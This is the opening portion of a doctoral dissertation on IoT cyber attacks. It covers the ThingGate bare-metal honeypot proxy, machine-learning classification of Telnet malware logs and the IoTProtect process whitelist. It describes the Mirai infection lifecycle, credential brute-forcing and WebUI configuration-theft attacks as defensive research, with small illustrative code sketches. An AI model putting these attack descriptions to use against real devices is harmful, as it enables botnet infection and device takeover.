A Study on Observation, Analysis, and Countermeasure of
Cyber Attacks in IoT
IoT におけるサイバー攻撃の観測、分析、および対
策に関する研究
By
CHUNJUNG WU
December, 2019
A doctoral dissertation submitted to
the Graduate School of Environment and Information Sciences,
Yokohama National University
Principal Advisor: Professor Tsutomu MATSUMOTO
Acknowledgement
First, I would like to express my deepest appreciation to my principal supervisor, Professor
Tsutomu Matsumoto, who has the attitude and substance of a genius: he constantly and convincingly
conveys the prudence and hard work that research demands. Without his guidance and persistent
help, this dissertation would not have been possible. I am incredibly grateful to Associate Professor
Katsunari Yoshioka, who taught me how to conduct cybersecurity research and write technical
papers. Without his leadership, discussions, and support, I would not have been able to finish my
study. I also gratefully acknowledge Professor Junji Shikata, whose insightful comments and advice
significantly contributed to my research.
I would like to thank Professor Tatsunori Mori and Lecturer Shinichi Shirakawa for serving
on my dissertation committee. Their valuable comments were extremely constructive. Special
thanks go to Dr. Shin-Ying Huang from the Institute for Information Industry for insightful
discussions and beneficial collaboration, and to Dr. Erwan Le Malecot for his critical
comments and help with the network infrastructure.
I am also indebted to the past and present members of the Matsumoto Laboratory, Shikata
Laboratory, and Yoshioka Laboratory. I learned a lot and received a great deal of help from them.
I also appreciate the help of the secretaries of the Matsumoto Laboratory and Yoshioka Laboratory:
Ms. Mio Narimatsu, Ms. Tomoko Ishidate, Ms. Kumiko Nakayama, Ms. Kiyono Yoshitani, and
Ms. Emiko Kawamura. Their kindness supported me through to graduation at Yokohama National
University.
Finally, I would like to thank my parents for their support and for giving me the chance to study at
Yokohama National University. I acknowledge everyone who helped me during my campus life.
Abstract
In recent years, cyber attacks in IoT have become increasingly rampant. Mirai Botnets executed a
massive distributed denial of service (DDoS) attack against Dyn DNS in 2016. A report from
Kaspersky in Sept. 2018 shows that Mirai is still the most popular IoT malware family among
cybercriminals (20.9%). Moreover, IoT malware keeps evolving and exploits multiple
vulnerabilities to infect IoT devices. Since May 2018, the Mirai and Bashlite malware families
have assimilated many known exploits affecting Internet of Things (IoT) devices. These exploits
target devices from 11 makers over the HTTP, UPnP, Telnet, and SOAP protocols. Besides malware,
human attackers also use various tools to access devices and collect various kinds of information
from them. For instance, the web UIs of IP cameras and routers are constantly searched for and
accessed if vulnerable. Hence, the tools for observing cyber attacks in IoT should be reconsidered
and evaluated. To observe and analyze such a variety of attacks in depth, there is an increasing
need for bare-metal IoT devices as honeypots, since it is costly to emulate device-specific
vulnerabilities and the complex functionalities of dedicated services. However, operating
bare-metal IoT honeypots poses unique technical challenges, mostly stemming from their low
configurability as embedded systems, which brings management and information leak problems.
In chapter 3, we introduce frequent cyber attacks against IoT. We then describe a framework for
the observation, analysis, and countermeasure of cyber attacks in IoT. The first component is a set
of techniques to support a honeypot consisting of physical IoT devices. A bare-metal honeypot needs
proper access control, such as filtering out bricking commands and changes to critical
configuration, while still allowing attackers to access its inside to some degree. An MITM proxy
can control the incoming and outbound traffic of the honeypot, filter out unwanted attack flows,
and prevent information leaks. The second component is a set of techniques for analyzing the
massive data of an IoT honeypot. We apply text-mining and machine learning algorithms to find new
attack vectors and categorize known Botnets' attacks. The third is a whitelisting-based
countermeasure against cyber attacks in IoT. Besides introducing the functionality, we show how to
protect the IoT devices in the honeypot from unwanted cyber attacks. We also propose a novel
approach for creating an appropriate view that analyzes the incoming data in depth and uses our
resources efficiently. Finally, we show a method to recognize and remove IoT malware processes by
examining the pathnames and binary hash values exposed in the "/proc" folder.
In chapter 4, we combine the abilities of a transparent proxy and a web tracking library to develop
ThingGate, a supporting mechanism for honeypots consisting of physical IoT devices. ThingGate can
improve the manageability of the honeypot, extend the functionality of web tracking, and manage
the incoming traffic and outgoing response content in an MITM manner. We evaluate ThingGate with
seven bare-metal IoT devices. The experimental results show that it successfully blocks unwanted
incoming attacks, masks wireless access point information of the devices, and tracks attackers on
the device web UI while showing high observability of various attacks exploiting different
vulnerabilities.
A drastic increase in cyber attacks targeting Internet of Things (IoT) devices over the Telnet
protocol has been observed since 2016. A Kaspersky report in Sept. 2018 estimated that Telnet is
still the primary attack vector of cyber attacks in IoT (75%). Therefore, in chapter 5,
we propose a novel method based on malware binaries, command sequences, and meta-features
to analyze 22.9 GB of Telnet logs and 5,616 different malware binaries collected by an IoT honeypot
over 284 days. We employ both unsupervised and supervised learning algorithms, together with
text-mining algorithms for handling unstructured data. Clustering analysis is applied to find
malware family members and reveal their inherent features for a better explanation. First, the
malware binaries are grouped using similarity analysis. Then, we extract key patterns of interaction
behavior using an N-gram model. We also train a multiclass classifier to identify IoT malware
categories based on common infection behavior. For misclassified subclasses, second-stage
sub-training is performed using a file meta-feature. Our results demonstrate 96.70% accuracy, with
high precision and recall. The results indicate that our method remained valid even for a dataset
spanning nine months. Although command sequences can change many times, trigram
features can accurately distinguish Mirai, Bashlite, and Hajime malware based on differences in
their infection command patterns. The clustering results reveal variant attack vectors and one
denial of service (DoS) attack that used pure Linux commands.
Many Internet-of-Things (IoT) devices, such as home routers and Internet Protocol (IP)
cameras, have been compromised through infection by malware as a consequence of weak
authentication and other vulnerabilities. Malware infection can lead to functional disorders and/or
misuse of these devices in cyber attacks of various kinds. However, unlike personal computers
(PCs), low-cost IoT devices lack rich computational resources, with the result that conventional
protection mechanisms, such as signature-based anti-virus software, cannot be used. In chapter 6,
we present IoTProtect, a light-weight and whitelist-based protection mechanism that can be
deployed easily on existing commercial products with very little modification of their firmware.
IoTProtect uses a whitelist to check processes running on IoT devices and terminate unknown
processes periodically. Our experiments using four low-cost IoT devices and 4,981 in-the-wild
malware binaries show that IoTProtect successfully terminated 99.92% of the processes created
by the binaries within 44 seconds after their infection with central processing unit (CPU) overhead
of 24% and disk space overhead of 288 KB.
Table of Contents
Acknowledgement
Abstract
Table of Contents
List of Figures
List of Tables
Chapter 1. Introduction
    1.1. Motivations and Contributions
    1.2. Organization
Chapter 2. Background and related work
    2.1 Internet of Things
    2.2. Cyber attacks in IoT
        2.2.1. Botnets
        2.2.2. Cyber attacks against WebUI of Physical IoT Devices
    2.3. Related works of honeypot consist of physical IoT devices
    2.4. Related works of Malware Analysis through machine learning
    2.5. Related works of countermeasure against cyber attacks in IoT
Chapter 3. Observation, Analysis, and Countermeasure of cyber attacks in IoT
    3.1. Observation of cyber attacks in IoT
    3.2. Analysis of cyber attacks in IoT
    3.3. Countermeasure of cyber attacks in IoT
Chapter 4. ThingGate: A gateway for flexible operation of bare-metal IoT honeypot
    4.1. Introduction
    4.2. Definitions
        4.2.1. Man-in-the-middle
        4.2.2. Transparent Proxy
        4.2.3. Browser fingerprinting
        4.2.4. Cyber attacks against WebUI of Physical IoT Devices
    4.3. ThingGate
        4.3.1. System goal
        4.3.3. System Architecture and Modules
    4.4. Evaluation
        4.4.1. Prototype and dataset
        4.4.2. Cyber attacks against the WebUI of physical IoT devices
        4.4.3. Blocking unwanted flow experiments
        4.4.4. Web tracking experiments
        4.4.5. Managing misplaced attacks experiments
        4.4.6. Fabricated sensor information experiment
        4.4.7. Stress testing against IoT devices
    4.5. Discussion
        4.5.1. Limitations
Chapter 5. IoT Malware Analysis and New Pattern Discovery Through Sequence Analysis Using Meta-Feature Information
    5.1. Introduction
    5.2. Methods
        5.2.1 Preliminaries
        5.2.2. Encoding and measurement of command sequences
        5.2.3. Data analysis
    5.3. Experiments
        5.3.1. Dataset and Environment
        5.3.2. Clustering Experiments
        5.3.3. Classification Experiments
    5.4. Discussion
Chapter 6. IoTProtect: Highly Deployable Whitelist-based Protection for Low-cost Internet-of-Things Devices
    6.1. Introduction
    6.2. Preliminaries
        6.2.1. Linux processes information
        6.2.2. Files in IoT devices
        6.2.3. Major premises of IoTProtect
    6.3. IoTProtect
    6.4. Evaluation
        6.4.1. Data collection and experimental devices
        6.4.2. Removal experiment
        6.4.3. Mitigating outgoing attacks
        6.4.4. Trade-off between security and device performance
        6.4.5. Evaluation of easy deployment
    6.5. Discussion
        6.5.1. Comparison with previous studies
        6.5.2. Limitations
Chapter 7. Conclusion and future works
    7.1 Conclusion
    7.2. Future works
Bibliography
List of Paper
    Reviewed papers in Journals
    Preparing to submit papers in Journals
    Technical Reports
Appendix
    Appendix A
    Appendix B
List of Figures
Fig. 1 Lifecycle of Mirai Botnet [16].
Fig. 2 Flow of studying cyber attacks in IoT.
Fig. 3 System overview of ThingGate
Fig. 4 System Architecture of ThingGate
Fig. 5 The processing flow of Request controller
Fig. 6 The encoded URL of CI-URL and decoded results
Fig. 7 Downloaded Scripts from CI-URL
Fig. 8 The HTTP request of a modifying configuration attack.
Fig. 9 Web Tracking flow of ThingGate
Fig. 10 Country distribution of fingerprinted clients
Fig. 11 Googlebot’s user-agent and the verifying result
Fig. 12 Vulnerability distribution of CI-URL
Fig. 13 Statistic of malware labels
Fig. 14 Fabricated Wi-Fi AP list
Fig. 15 Trigram statistics of Bashlite IoT malware.
Fig. 16 Trigram statistics of Mirai IoT malware.
Fig. 17 Trigram statistics of Satori IoT malware.
Fig. 18 Data analysis flow
Fig. 19 Labeled hierarchical clustering results of ECTs in April 2017
Fig. 20 Statistics regarding attacking hosts observed by IoTPOT from January 2016 to March 2017
Fig. 21 Format of the maps [100]
Fig. 22 Filesystems of ASUS Wi-Fi router RT-AC3200
Fig. 23 Distribution of ASUS RT-AC3200 files
Fig. 24 Experimental environment for measuring outgoing attack mitigation by IoTProtect
Fig. 25 Results of experiment on mitigating outgoing attacks
Fig. 26 Experimental environment for measuring the trade-off between performance and security
Fig. 27 Results of experiment measuring trade-off
List of Tables
Table 1 IoT devices used in experiments.
Table 2 Data set for analysis.
Table 3 HTTP method statistics for dataset 2.
Table 4 Statistics of cyber attacks. Observation of 7 months.
Table 5 Cyber attacks against WebUI of IoT devices. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Table 6 Configuration blacklist and replaced pathnames against IP Camera A1~A3.
Table 7 Features of the fingerprinted clients.
Table 8 Information of Vulnerabilities. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Table 9 Part of attackers who request Wi-Fi information. Observation of 7 months from IP Camera A1~A3, B, C, and D.
Table 10 IoT devices used in experiments.
Table 11 Comparison of labels and infection command sequence [4].
Table 12 Top 5 antivirus engines for IoT malware.
Table 13 An example of the command mapping table.
Table 14 Distance measures for different malware labels (average).
Table 15 Distance measures for different malware labels (minimum).
Table 16 Distance measures for different n-gram between Bashlite and Mirai
Table 17 Time cost for different n-gram between Bashlite and Mirai
Table 18 Dataset for analysis.
Table 19 Malware categories and ECTs' distribution.
Table 20 Statistics of time cost.
Table 21 Victims of Fileless DoS.
Table 22 Classification performance of even sampling- Naive Bayes.
Table 23 Classification performance of even sampling- SVM.
Table 24 Classification performance of random sampling- Naive Bayes.
Table 25 Classification performance of random sampling- SVM.
Table 26 Precision/recall of SVM – second stage (reinforcement learning).
Table 27 Commercial secure software against embedded systems.
Table 28 Table of symbols.
Table 29 IoT devices used in conducting the experiments.
Table 30 IoT malware used for conducting the experiments.
Table 31 Results of the removal experiments.
Table 32 IoTProtect overheads.
Table 33 Cost of creating whitelists.
Chapter 1.
Introduction
1.1. Motivations and Contributions
Over the past years, people have been connecting various things to the internet for monitoring,
data collection, or remote manipulation. Backend applications collect and exchange data with
these devices through the network. A network of this kind is called the internet of things
(IoT). Gartner estimated that 6.4 billion IoT devices were in use in 2016, and the number is
projected to grow to 20.8 billion by 2020 [1]. Most IoT devices, however, use simple, low-level
hardware and lack antivirus and monitoring services. Moreover, many users are not
aware of the need to change the default credentials of admin accounts.
In Oct. 2016, the IoT malware “Mirai” used a list of default credentials to log in to IoT devices
and gain root privileges. It then downloaded malware binaries and conducted further infections and
DDoS attacks. As a result, Mirai conducted a massive Distributed Denial of Service (DDoS)
attack against Dyn DNS. About 100,000 Mirai IoT Botnet nodes were enlisted in this incident,
and the reported attack rates were up to 1.2 Tbps [2]. Cyber threats from IoT Botnets have thus
become a reality.
Further, IoT malware keeps evolving and exploits multiple vulnerabilities to infect IoT devices.
Since May 2018, the Mirai and Gafgyt malware families have assimilated multiple known exploits
affecting Internet of Things (IoT) devices. These exploits target devices from 11 makers over the
HTTP, UPnP, Telnet, and SOAP protocols [3]. Besides DDoS attacks, new IoT malware has
diverse purposes including coin mining, click fraud, and sending spam emails. In addition,
human attackers also use various tools to access devices and collect various kinds of information
from them. For example, the WebUIs of many IP cameras and routers are constantly searched for and
accessed if vulnerable.
To observe cyber attacks against IoT devices and analyze the threats from IoT malware,
researchers have designed new observation mechanisms and built various honeypots. These honeypots
include, for example, IoTPOT [4], SIPHON [5], IoTCandyJar [6], and a real-device honeypot for
observing the Web UI of IoT devices [7]. These honeypots successfully observed various cyber
attacks in IoT. However, some human-like attackers modify the configuration in ways that reduce
the effectiveness of the honeypot, such as changing network settings and updating the firmware.
Besides, the tremendous flow of cyber attacks in IoT raises an urgent need for a method that
analyzes the massive incoming data in depth and uses resources efficiently. Moreover, we want
to find a countermeasure against cyber attacks in IoT.
Based on the honeypot methodology and the attack campaigns of IoT malware, this dissertation
proposes three methods for observation, analysis, and countermeasure against cyber attacks in
IoT. The first method provides a control and protection mechanism for a bare-metal IoT honeypot,
namely, a real IoT device used as a honeypot. Real devices are used because it is costly to emulate
device-specific vulnerabilities and the complicated functionalities provided through their WebUI
and other dedicated services, such as UPnP.
The first method focuses on managing the incoming traffic and response information of the
bare-metal IoT honeypot. We propose ThingGate, a customized proxy placed transparently between
the honeypot and the internet. ThingGate filters out unwanted HTTP requests such as
deadly attack vectors and critical configuration changes. Moreover, it prevents the
leakage or exposure of sensitive information and injects fingerprinting JavaScript code in
a man-in-the-middle (MITM) manner to track user clients. We use physical IoT devices as a honeypot,
and these devices are known to have been targeted by IoT malware. We cannot claim that the
honeypot catches all attacks in IoT, as we have only a limited number of devices for the
honeypot. Some IoT malware does not check the targeted device before sending malicious
HTTP requests. For such misplaced attack vectors, which target IoT devices that are not among our
physical IoT devices, the proxy redirects the vectors to the analysis module for further
real-time analysis. With this approach, during 7 months of operation, ThingGate successfully blocked
one critical configuration change attack. In addition, we collected 26 fingerprints of clients from
18 different source IPs. ThingGate also sent fabricated Wi-Fi information to 44 different
clients who accessed the Wi-Fi web page, and analyzed 411 misplaced HTTP
requests, which contained 50 different URLs that exploited seven vulnerabilities. Moreover,
ThingGate successfully collected 150 different malware binaries and 23 scripts.
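The three outcomes for an incoming HTTP request described above (block, forward to the device, or redirect to the analysis module) can be illustrated with a minimal Python sketch. It is not ThingGate's implementation: the path prefixes in `CONFIG_BLACKLIST` and `DEVICE_PATH_PREFIXES`, the `Decision` names, and the `classify_request` function are hypothetical and chosen only for illustration.

```python
from enum import Enum
from urllib.parse import urlsplit


class Decision(Enum):
    BLOCK = "block"      # critical configuration change or bricking attempt
    FORWARD = "forward"  # request that the physical device can answer
    ANALYZE = "analyze"  # misplaced request aimed at a device we do not operate


# Hypothetical examples; a real deployment would derive these per device.
CONFIG_BLACKLIST = ("/cgi-bin/firmware_upgrade", "/cgi-bin/set_network")
DEVICE_PATH_PREFIXES = ("/index.html", "/cgi-bin/", "/wifi.html")


def classify_request(url: str) -> Decision:
    """Decide what the proxy does with one incoming request URL."""
    path = urlsplit(url).path or "/"
    # The blacklist is checked first so that it overrides the device prefixes.
    if path.startswith(CONFIG_BLACKLIST):
        return Decision.BLOCK
    if path == "/" or path.startswith(DEVICE_PATH_PREFIXES):
        return Decision.FORWARD
    return Decision.ANALYZE
```

Checking the blacklist before the device prefixes is a deliberate choice in this sketch: a blacklisted configuration path is blocked even when it sits under a directory that the device otherwise serves.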
The second method focuses on applying machine learning techniques to analyze the data observed
by IoT honeypots. According to a report from Kaspersky in Sept. 2018, the most popular
attack and infection vector against devices remains the Telnet service (75.4%) [8]. Thus, the second
method targets the Telnet logs of the IoT honeypot. The method determines the category of malware
by analyzing its meta-features and command sequences. We extracted 2.7 million critical Telnet
logs from 22.9 GB of Telnet log files. This approach maps the logs' commands to a smaller dataset
and performs classification and clustering analysis. Its contributions are summarized as follows:
1. We demonstrated that similar IoT malware binaries issue similar infection commands. Moreover,
through similarity analysis of command sequences, we can identify the malware category of
unknown threats.
2. By clustering Telnet logs, we discovered a new DoS cyber attack executed using pure Linux
commands, without IoT malware binaries.
3. Evaluating with 5,516 malware samples from the IoT honeypot, our proposed method could
identify four major malware categories with 96.70% accuracy.
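As a rough illustration of similarity analysis over command sequences, the sketch below extracts trigrams from a sequence of shell commands and compares two sequences. The Jaccard distance is an assumption made for this example; the text above does not state which distance measure the method uses. The function names and the sample command sequences are likewise hypothetical.

```python
from typing import List, Set, Tuple

Trigram = Tuple[str, ...]


def trigrams(commands: List[str]) -> Set[Trigram]:
    """Return the set of consecutive command triples in a sequence."""
    return {tuple(commands[i:i + 3]) for i in range(len(commands) - 2)}


def jaccard_distance(a: Set[Trigram], b: Set[Trigram]) -> float:
    """Return 0.0 for identical trigram sets and 1.0 for disjoint ones."""
    if not a and not b:
        return 0.0
    return 1.0 - len(a & b) / len(a | b)


# Two hypothetical infection sequences that differ only in the last command.
seq_a = ["enable", "system", "shell", "sh", "busybox"]
seq_b = ["enable", "system", "shell", "sh", "wget"]
distance = jaccard_distance(trigrams(seq_a), trigrams(seq_b))
```

Here the two sequences share two of four distinct trigrams, so `distance` is 0.5. Sequences shorter than three commands yield an empty trigram set.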
The third method is a whitelisting method for protecting low-cost IoT devices. This method
checks the MD5 hash value of the binary and the pathname of each user-space process, and then
removes the processes that are not in the whitelists. We implemented a shell script prototype and
showed that it could be executed successfully on low-cost IoT devices, such as Wi-Fi routers and
storage devices, at marginal cost. We tested 4,981 different IoT malware binaries on four
different bare-metal IoT devices, and IoTProtect removed 99.92% of these malicious processes
successfully. IoTProtect is easy to deploy on existing IoT devices. The
installation procedure for the IoTProtect checker is very light and quick. The checker program is
written as Bash scripts, which makes it portable between different Linux distributions. Moreover,
the checker program is only 1.5 KB in size, which allows quick deployment on
low-cost IoT devices.
1.2. Organization
The rest of this dissertation is organized as follows. Chapter 2 presents the background and
related work. Chapter 3 describes the observation, analysis, and countermeasure of cyber attacks
in IoT, a methodology based on an IoT honeypot consisting of physical IoT devices. Chapter 4
details the implementation of a protection and management mechanism for the IoT honeypot. This
approach focuses on protecting the WebUI of physical IoT devices from information leaks,
unwanted requests, and bricking attacks. Chapter 5 discusses a novel method for analyzing the
massive Telnet attack vector logs to create an in-depth view of cyber attacks in IoT. Chapter 6
discusses a whitelisting-based IoT malware removal method for light-weight devices. The
dissertation concludes with Chapter 7.
Chapter 2.
Background and related work
2.1. Internet of Things
The concept of a network of smart devices was discussed as early as 1982, when a modified
Coke vending machine at Carnegie Mellon University became the first Internet-connected
appliance, able to report its inventory and whether newly loaded drinks were cold [9].
In 1994, Reza Raji [10] described the concept in IEEE Spectrum as “moving small packets of
data to a large set of nodes, to integrate and automate everything from home appliances to entire
factories.”
The term “Internet of things” was likely coined by Kevin Ashton of MIT’s Auto-ID Center in
1999, though he prefers the phrase “Internet for things.” At that point, he viewed radio-frequency
identification (RFID) as essential to the Internet of things [11]. Huvio, Grönvall, and Främling
proposed an information system infrastructure for implementing smart, connected objects; their
use of the term Internet of Things more closely matches the modern meaning of IoT [12].
According to the Cisco Internet Business Solutions Group (IBSG), the IoT is the point in time
when more “things or objects” were connected to the Internet than people. Cisco Systems
estimated that the IoT was “born” between 2008 and 2009, with the things/people ratio growing
from 0.08 in 2003 to 1.84 in 2010 [13].
2.2. Cyber attacks in IoT
2.2.1. Botnets
A Botnet is a collection of Internet-connected devices, each of which runs one or more bots. Bots
are agent programs on compromised host machines that maintain access so that attackers can
control them. Typically, a bot installed on a victim machine establishes outbound connections to
a command and control (C&C) server. Botnets can be used to perform distributed denial-of-service
(DDoS) attacks, steal data, send spam, and give the attacker access to the device and its
connection. The botmaster controls the Botnet using the C&C software [14].
Other Botnet malware families, such as Bashlite [15], targeted IoT devices before Mirai.
However, Mirai was the first IoT Botnet to emerge as a high-profile DDoS threat. In
2016, the Mirai Botnet infected nearly 65,000 IoT devices in its first 20 hours before reaching a
steady-state population of 200,000–300,000 infections [16]. Hence, we use the Mirai Botnet to
explain the Botnet attack campaign against IoT.
Fig. 1 shows the lifecycle of Mirai. In phase 1, Mirai asynchronously and "statelessly" sends
TCP SYN probes to pseudorandom IPv4 addresses, excluding those in a hard-coded IP
blacklist, on Telnet TCP ports 23 and 2323. If Mirai identifies a potential victim, it enters a
brute-force login phase in which it attempts to establish a Telnet connection using credentials
selected randomly from a pre-configured list of 62 credentials. At the first successful login,
Mirai sends the victim IP and associated credentials to a hard-coded report server in phase 2. The
report server dispatches the victim information to a loader in phase 3. The separate loader
program infects the vulnerable device by downloading and executing architecture-specific
malware in phase 4. Through phases 1 to 4, Mirai builds the IoT Botnet. To launch a DDoS
attack, the attacker sends commands to the C&C server in phase 5. The C&C server then relays the
commands to the bots on the Botnet's devices in phase 6. Finally, these victim devices generate
DDoS traffic and attack the DDoS target in phase 7 [16].
Fig. 1 Lifecycle of Mirai Botnet [16].
2.2.2. Cyber attacks against WebUI of Physical IoT Devices
In 2017, Ezawa et al. [7] proposed a honeypot consisting of physical IoT devices to observe
cyber attacks against the WebUI of IoT devices. In 2018, Tamiya et al. [17] employed five IP
Cameras to build a decoy honeypot to capture the behavior of peeping attackers. Based on
their observations, we summarize four kinds of cyber attacks against these WebUIs:
1. Configuration information theft attacks
If the device has information disclosure vulnerabilities or weak credentials, the
attacker can collect the configuration and parameters of the device through certain URLs,
such as get_status.cgi.
2. Modification of the configuration
Attackers may modify the DDNS, VPN, credentials, and network configuration, which
impacts the effectiveness of the honeypot.
3. Snapshot attacks
Snapshot is a feature of IP Cameras that offers users a current image of the live stream.
Once a client sends the HTTP request for a snapshot, the web server provides the current
image as a JPG or PNG file.
4. Long-term peeping
IP Cameras record this attack when a client accesses the URL of the live stream and stays
on the live-stream web page for several hours.
2.3. Related work on honeypots consisting of physical IoT devices
To observe cyber attacks in IoT, researchers have developed new tools and platforms for
monitoring. In [5], Guarnizo et al. proposed the SIPHON architecture, a scalable
high-interaction honeypot platform for IoT devices. Their architecture leverages IoT devices
physically present at one location and connected to the Internet through so-called wormholes
distributed worldwide. The resulting architecture allows the exposure of a few physical devices
over numerous geographically distributed IP addresses.
Many embedded devices have a WebUI for device management and operation, and some of them
are open to the Internet with vulnerabilities and weak credentials. Ezawa et al. [7] proposed the use
of a honeypot to monitor attacks against the WebUI of IoT devices by employing bare-metal
devices. The observation results contained attacks against regular web servers and indicated that
some attacks are automatically conducted through certain tools or types of malware. The
observation also suggests that some attackers changed the DDNS, VPN, and network settings,
resulting in the device becoming unavailable for other attackers.
Tamiya et al. [17] employed a decoy honeypot consisting of five IP Cameras to capture the
behavior of human-like attackers. Their research shows behavior that includes extracting the
environment parameters of devices, downloading snapshots of live streams, and long-term
peeping at live streams.
Compared with our work, the previous honeypots built from physical IoT devices lack protection
against sensitive information leaks and dangerous commands. Our work focuses on the
high-interaction honeypot consisting of physical IoT devices. Our approach improves the security
of the honeypot, including protecting sensitive data collected by sensors. In addition, our program
monitors and manages the incoming traffic to block dangerous commands. Moreover, we
extended the web tracking function to the WebUI of physical devices. Further, our setup allows us
to capture and analyze, in real time, misplaced attacks that exploit different remote code
execution vulnerabilities.
2.4. Related work on malware analysis through machine learning
IoT Botnets have generated massive attack traffic against IoT devices all over the world, including
IoT honeypots. One IoT honeypot, IoTPOT, collected 124 million attack vector logs over the
Telnet protocol and 40,000 different malware binaries between 2015 and 2017.
To analyze these data in depth and efficiently, we review the literature on malware analysis
through machine learning. Yen et al. (2013) conducted an epidemiological study of malware
encountered in a large, multinational enterprise. They collected security and network
infrastructure logs to determine the key behavioral features of web-based malware. Moreover,
they used a logistic regression model to identify and rank the malware risk [18]. Masud, Khan,
and Thuraisingham presented a method of detecting malicious executables that combined three
types of features: binary N-grams, assembly instruction sequences, and dynamic-link library
function calls [19].
In 2015, Microsoft and Kaggle held the Malware Classification Challenge (BIG 2015), in
which Microsoft provided 20,000 Windows malware binary and assembler code files, with nine
categories of malware. Contestants had to classify the malware categories as well as possible. The
winning team extracted different features from the ASM file opcode and gathered pixel data from
malware disk images, then applied an N-gram algorithm to predict the malware category, thereby
achieving 99.7% accuracy. Ahmadi et al. subsequently used similar features to improve the
classification algorithm and achieve 99.8% accuracy with lower computational costs [20].
Drew, Moore, and Hahsler applied the Strand gene sequence classifier, which offers a robust
classification strategy that easily accommodates unstructured data, to malware classification.
Their method was used on approximately 500 GB of data to predict nine polymorphic malware
categories, and the results indicated that, with minimal adaptations, it achieved an accuracy of
well over 95% [21]. Most of this research analyzed Windows-based malware and ran its
experiments on MS Windows platforms.
For Linux/Unix malware, Shahzad and Farooq analyzed 709 Linux executable and linkable
format (ELF) files, extracting features from the ELF header and then applying machine-learning
classifiers to detect malware. Their method achieved 99% detection accuracy, with a false alarm
rate of less than 0.1% [22]. Bai et al. gathered features from ELF file system calls and tested four
classification algorithms (J48, Random Forest, AdaBoostM1, and IBk) for detecting Linux
malware, achieving a detection accuracy of approximately 98% [23].
Given that serious worm attacks have occurred through the Internet, Wang et al. proposed a
worm detection method based on mining dynamic program executions. They analyzed system
calls from MS Windows and Linux and traced system call sequences using a natural language
processing algorithm. They also applied the machine-learning algorithms Naive Bayes and
Support Vector Machines (SVM), with SVM achieving a 99.5% worm detection rate and a 2.22%
false positive rate [24].
For Android malware, Ham et al. [25] extracted features about the network, phone, message,
CPU, battery, and memory for each process on Android devices. They applied a linear SVM to
detect Android malware and compared its detection performance with that of
other machine learning classifiers. They showed that the SVM outperforms the other
classifiers, with an accuracy of 0.995 and a precision of 0.957.
Azmoodeh, Dehghantanha, and Choo [26] presented a deep-learning-based method to detect
Internet of Battlefield Things (IoBT) malware via the device’s Operational Code (OpCode)
sequence. They transmuted OpCodes into a vector space and applied a deep Eigenspace learning
approach to classify malicious and benign applications. Their method achieved 99.68%
accuracy and 98.37% recall.
Su et al. [27] proposed a novel lightweight method of detecting DDoS malware in IoT
environments. First, one-channel grayscale images converted from binaries were extracted, and
then a lightweight convolutional neural network was used to classify IoT malware families. The
experimental results indicated that this system could achieve 94.0% accuracy in goodware and
DDoS malware classification and 81.8% accuracy in classification of goodware and the two main
malware families.
Our study examines Linux malware. Its major difference from other research lies in the dataset:
we primarily analyze shell commands issued by IoT malware, and also examine the file
meta-information when necessary.
2.5. Related work on countermeasures against cyber attacks in IoT
The attack campaign of the Mirai Botnet shows that a countermeasure against cyber attacks in
IoT is urgently needed. Moreover, the countermeasure should be applicable to light-weight IoT
devices. In this section, we review research on whitelisting solutions for detecting malware.
Pareek, Romana, and Eswari consider that blacklisting-based solutions for detecting malware
suffer from problems of false positives and negatives. They share the idea of application
whitelisting that has been applied by security vendors and various other solutions. They also
provide details regarding design and implementation approaches and discuss challenges to
developing an effective whitelisting solution [28].
Obermeier, Schierholz, and Hristova apply whitelisting to applications for protecting industrial
automation and control systems. They find application whitelisting to be an effective means of
preventing the installation of malware [29]. Bhardwaj et al. developed a process monitoring
system based on blacklisting and whitelisting of process names [30]. Further, they developed an
application called “Debsums” to calculate the MD5 sums of an installed package and compare
them with those from existing processes [31]. However, an adversary can easily alter process
names and thus evade detection.
Paleari et al. present an architecture for automatic generation of procedures for recovery from
malicious programs. This method extracts the behavior of applications and monitors system calls
using QEMU, an emulator and monitor of virtual machines. In addition, they propose clustering
the behavior of malware to construct recovery procedures [32].
In 2011, Shahzad et al. proposed a classification-based method that analyzes a minimal feature
set of 11 features for distinguishing benign and malicious processes. This method provides 93%
detection accuracy with a 0% false alarm rate within 100 milliseconds [33].
In 2017, Tamiya et al. proposed a method for disinfecting IoT devices by merely rebooting or
resetting the infected devices [34]. Their experiments show that 45 existing IoT malware could
be erased by the simple operation of rebooting, but they did not present a detection method for
these malware binaries.
Koike et al. developed a whitelisting-based execution control technique called “WhiteEgret”
for the Linux operating system (OS). This module uses the bprm_check_security hook and the
mmap_file hook to monitor the absolute path of executable files. WhiteEgret permits execution
if the absolute path is contained in the whitelist and the hash value of the executable file is also
contained in the hash value whitelist [35].
As shown in the above literature review, there is no existing research on IoT cybersecurity
conducted on low-cost devices together with a process-level defense mechanism other than [35].
Moreover, all of the existing technologies require substantial modification of firmware and incur
a significant engineering cost if deployed on existing products. We propose a protection method
that is very light-weight and easy to deploy on existing low-cost IoT devices.
Chapter 3.
Observation, Analysis, and Countermeasure of cyber attacks
in IoT
This dissertation studies cyber attacks in IoT. The research has three phases, and we propose
one novel method in each phase. The three methods have no dependencies on one another and
can be used individually. Observation is the first cornerstone of research on cyber attacks.
Many studies use honeypots to observe cyber attacks in IoT, and some of them use virtual
machines to emulate IoT devices. However, Cozzi et al. [36] analyzed 10,548 Linux malware
binaries collected between Nov. 2016 and Nov. 2017 and found that 19 samples detect sandboxes
and 259 samples perform process enumeration. Therefore, some IoT malware may in the future
evade IoT honeypots that consist of virtual machines. Besides, some cyber attacks, such as the
long-term peeping attack, target physical IoT devices that are hard to emulate with a virtual
machine. As a result, our method focuses on physical IoT devices. We build the honeypot from
physical IoT devices and develop a proxy to solve the problems arising from the WebUI of
physical IoT devices.
The next phase of the research is to analyze the observation results in depth. We propose a novel
analysis process that uses machine learning techniques to analyze the attack data collected by
the IoT honeypot consisting of physical IoT devices. The last phase is to develop a
countermeasure against cyber attacks in IoT. Based on the patterns and findings from the analysis,
we propose IoTProtect, a countermeasure against IoT Botnets, and evaluate it with IoT
malware on physical IoT devices. Fig. 2 shows the mapping between the flow of research and our
methods. Because each approach pursues a different goal, we introduce the three
approaches separately in Sections 3.1, 3.2, and 3.3.
Fig. 2 Flow of studying cyber attacks in IoT.
3.1. Observation of cyber attacks in IoT
Applying physical IoT devices for building honeypots brings the following challenges:
1. The resources of IoT devices are limited, and installing additional libraries may require
modifying the firmware.
2. The reset or recovery process needs manual operation on the device. Many IoT devices
